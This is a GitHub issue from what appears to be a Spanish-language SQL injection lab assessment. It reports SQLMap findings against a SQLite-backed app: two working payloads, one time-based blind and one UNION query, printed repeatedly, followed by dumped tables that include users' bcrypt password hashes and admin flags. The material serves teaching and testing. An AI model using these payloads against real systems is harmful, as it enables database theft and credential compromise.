search

diegojoel301 / Evaluacion_Modulo_SQLi_DSWP

Laboratorio de la evaluacion del Modulo SQLi
0 stars 0 forks source link

SQLMap - Dos Payloads #3

Open cbreckenridge23 opened 2 months ago

cbreckenridge23 commented 2 months ago

Mediante la ejecución de SQLMap, se lograron identificar dos payloads que fueron aprovechados para dumpear las bases de datos. Lo anterior se logró con la cookie de user3:password123.

Se adjunta el resultado de la consulta

Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))

Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-2794 UNION ALL SELECT 6918,CHAR(113,107,112,118,113)||CHAR(66,87,86,65,74,87,104,108,82,102,83,114,77,70,75,104,68,77,82,119,120,79,104,71,77,122,67,88,110,119,84,98,75,101,86,109,107,107,120,119)||CHAR(113,120,106,113,113),6918-- uznw
imagen

Cabe indicar que mediante estos payloads se lograron identificar que el servidor posee las siguientes bases de datos:

imagen

Tablas: Farmacos, session_cookies, sqlite_sequence y usuarios

cbreckenridge23 commented 2 months ago

sqlmap identified the following injection point(s) with a total of 8043 HTTP(s) requests:

Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))

Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw

back-end DBMS: SQLite sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))

Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw

back-end DBMS: SQLite Database: Table: session_cookies [4 columns] +----------------+----------+ | Column | Type | +----------------+----------+ | created_at | DATETIME | | id | INTEGER | | session_cookie | TEXT | | user_id | INTEGER | +----------------+----------+

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))

Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw

back-end DBMS: SQLite Database: Table: sqlite_sequence [2 entries] +-----+----------+ | seq | name | +-----+----------+ | 4 | usuarios | | 2 | farmacos | +-----+----------+

Database: Table: farmacos [2 entries] +----+-------------+--------------+ | id | nombre | descripcion | +----+-------------+--------------+ | 1 | Aspirina | Analgésico | | 2 | Paracetamol | Antipirético | +----+-------------+--------------+

Database: Table: session_cookies [0 entries] +----+---------+------------+----------------+ | id | user_id | created_at | session_cookie | +----+---------+------------+----------------+ +----+---------+------------+----------------+

Database: Table: usuarios [4 entries] +----+----------+--------------------------------------------------------------+----------+ | id | is_admin | password | username | +----+----------+--------------------------------------------------------------+----------+ | 1 | 1 | $2b$12$m4hPcCsuBGCPK6y/aR5xmuE0Xe.C4qgVGDSWomhl3kaPSOCbKqZX. | admin | | 2 | 0 | $2b$12$07jsdrqWJ8hro76Q2aiU0u76gR9YIQouHBPMAz2eOADbQz3pd1bLK | user1 | | 3 | 0 | $2b$12$ptgidjz1BIYtdr8sovgu7OsLRCGNrjnWkvVKLLAnCQ7uonqKcKrYe | user2 | | 4 | 1 | $2b$12$zutMHDeb5RO3ELon61g2AuH41MvyUoRm9RjU5xrI6drPQTSapS/hG | user3 | +----+----------+--------------------------------------------------------------+----------+

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))

Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw

back-end DBMS: SQLite sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))

Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw

back-end DBMS: SQLite banner: '3.40.1' current user is DBA: True Database: Table: farmacos [2 entries] +----+-------------+--------------+ | id | nombre | descripcion | +----+-------------+--------------+ | 1 | Aspirina | Analgésico | | 2 | Paracetamol | Antipirético | +----+-------------+--------------+

Database: Table: session_cookies [0 entries] +----+---------+------------+----------------+ | id | user_id | created_at | session_cookie | +----+---------+------------+----------------+ +----+---------+------------+----------------+

Database: Table: usuarios [4 entries] +----+----------+--------------------------------------------------------------+----------+ | id | is_admin | password | username | +----+----------+--------------------------------------------------------------+----------+ | 1 | 1 | $2b$12$m4hPcCsuBGCPK6y/aR5xmuE0Xe.C4qgVGDSWomhl3kaPSOCbKqZX. | admin | | 2 | 0 | $2b$12$07jsdrqWJ8hro76Q2aiU0u76gR9YIQouHBPMAz2eOADbQz3pd1bLK | user1 | | 3 | 0 | $2b$12$ptgidjz1BIYtdr8sovgu7OsLRCGNrjnWkvVKLLAnCQ7uonqKcKrYe | user2 | | 4 | 1 | $2b$12$zutMHDeb5RO3ELon61g2AuH41MvyUoRm9RjU5xrI6drPQTSapS/hG | user3 | +----+----------+--------------------------------------------------------------+----------+

Database: Table: sqlite_sequence [2 entries] +-----+----------+ | seq | name | +-----+----------+ | 4 | usuarios | | 2 | farmacos | +-----+----------+

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))

Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw

back-end DBMS: SQLite sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))

Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw

back-end DBMS: SQLite sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))

Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw

back-end DBMS: SQLite sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))

Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw

back-end DBMS: SQLite

cbreckenridge23 commented 2 months ago

farmacos.csv session_cookies.csv sqlite_sequence.csv usuarios.csv